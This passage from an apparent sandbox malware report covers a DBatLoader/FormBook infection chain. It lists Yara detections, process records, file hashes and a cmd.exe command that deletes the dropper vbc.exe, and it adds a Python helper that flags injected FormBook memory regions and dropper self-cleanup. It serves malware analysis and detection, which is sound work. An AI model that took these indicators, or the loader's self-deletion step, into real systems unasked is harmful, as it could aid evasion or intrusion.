                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 36%, ReversingLabs
                                                            Reputation:low

                                                            General

                                                            Start time:19:34:23
                                                            Start date:02/12/2021
                                                            Path:C:\Users\user\Odhbljup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Odhbljup.exe"
                                                            Imagebase:0x400000
                                                            File size:697856 bytes
                                                            MD5 hash:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            Reputation:low

                                                            General

                                                            Start time:19:34:25
                                                            Start date:02/12/2021
                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                            Imagebase:0x870000
                                                            File size:279552 bytes
                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:19:34:31
                                                            Start date:02/12/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                                            Imagebase:0x49e50000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
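Two records above carry the security-relevant signal of this stage: NAPSTAT.EXE, a Microsoft binary loaded from C:\Windows\SysWOW64 with an image base of 0x870000, matches three FormBook rules in memory regions at 0x80000, 0x1B0000 and 0x1F0000, the first two with protection 0x40 (PAGE_EXECUTE_READWRITE), i.e. the payload lives in writable, executable memory outside the host's own image, which is what process hollowing looks like from a memory dump; the cmd.exe record then deletes the dropper C:\Users\Public\vbc.exe. The following triage helper, added here as an illustration and not part of Joe Sandbox or of this report, parses match lines and process records of exactly the shape printed above and flags those two patterns. The field layout it assumes for a dump name (<process>.<stage>.<timestamp>.<base address>.<protection>.<type>.sdmp) is an assumption; the PAGE_* values are the documented Win32 constants. The sample lines are copied from the NAPSTAT.EXE and cmd.exe records on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Documented Win32 memory-protection constants (VirtualAlloc / VirtualProtect).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# ASSUMED layout of a sandbox memory-dump name:
# <process>.<stage>.<timestamp>.<base address>.<protection>.<type>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp$"
)

# One "Rule: ..., Description: ..., Source: ..., Author: ..." line as printed in the report.
YARA_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.+?),\s*"
    r"Source:\s*(?P<src>\S+),\s*Author:\s*(?P<author>.+)$"
)

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
DROP_DIRS = ("c:\\users\\public\\",)  # world-writable staging directory used by this sample


@dataclass
class YaraHit:
    rule: str
    description: str
    proc: int       # process index in the report (assumed meaning of field 1)
    base: int       # base address of the dumped region
    protect: int    # PAGE_* protection of the region
    author: str

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, hex(self.protect))

    @property
    def writable_executable(self) -> bool:
        return self.protect == 0x40


@dataclass
class ProcessRecord:
    path: str
    commandline: str
    yara: List[YaraHit] = field(default_factory=list)


def parse_yara_line(line: str) -> YaraHit:
    """Turn one bullet from the 'Yara matches' list into a structured hit."""
    m = YARA_RE.search(line)
    if not m:
        raise ValueError(f"not a Yara match line: {line!r}")
    s = SDMP_RE.match(m["src"])
    if not s:
        raise ValueError(f"unrecognised dump name: {m['src']!r}")
    return YaraHit(m["rule"].strip(), m["desc"].strip(), int(s["proc"], 16),
                   int(s["base"], 16), int(s["protect"], 16), m["author"].strip())


def triage(procs: List[ProcessRecord]) -> List[str]:
    """Flag (1) a system binary hosting malware-family Yara hits in RWX memory and
    (2) cmd.exe deleting a file out of a public drop directory (dropper self-cleanup)."""
    findings = []
    for p in procs:
        low = p.path.lower()
        rwx = [h for h in p.yara if h.writable_executable]
        if low.startswith(SYSTEM_DIRS) and rwx:
            rules = ", ".join(sorted({h.rule for h in rwx}))
            regions = ", ".join(hex(h.base) for h in rwx)
            findings.append(f"{p.path}: {len(rwx)} Yara hit(s) in PAGE_EXECUTE_READWRITE "
                            f"memory at {regions} ({rules}) -> likely injection/hollowing")
        m = re.search(r'/c\s+del\s+"?([^"]+)"?', p.commandline, re.IGNORECASE)
        if low.endswith("\\cmd.exe") and m and m.group(1).lower().startswith(DROP_DIRS):
            findings.append(f"{p.path}: deletes {m.group(1)} -> dropper self-cleanup")
    return findings


# Sample input copied from the NAPSTAT.EXE and cmd.exe records of this report.
NAPSTAT_YARA = [
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: Joe Security",
    "• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security",
]


def report_processes() -> List[ProcessRecord]:
    napstat = ProcessRecord(r"C:\Windows\SysWOW64\NAPSTAT.EXE", r"C:\Windows\SysWOW64\NAPSTAT.EXE",
                            [parse_yara_line(l) for l in NAPSTAT_YARA])
    cmd = ProcessRecord(r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\Public\vbc.exe"')
    return [napstat, cmd]


if __name__ == "__main__":
    for f in triage(report_processes()):
        print(f)
```

The third NAPSTAT.EXE hit (0x1F0000, protection 0x04) is deliberately not counted as injection evidence: a FormBook signature in plain read-write memory is consistent with decrypted configuration or strings, while the 0x40 regions are the ones that can actually execute. On a live host the same two rules map onto an EDR query over process creation and memory-protection events; here they are only run over the report's own text.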

                                                            Disassembly

                                                            Code Analysis
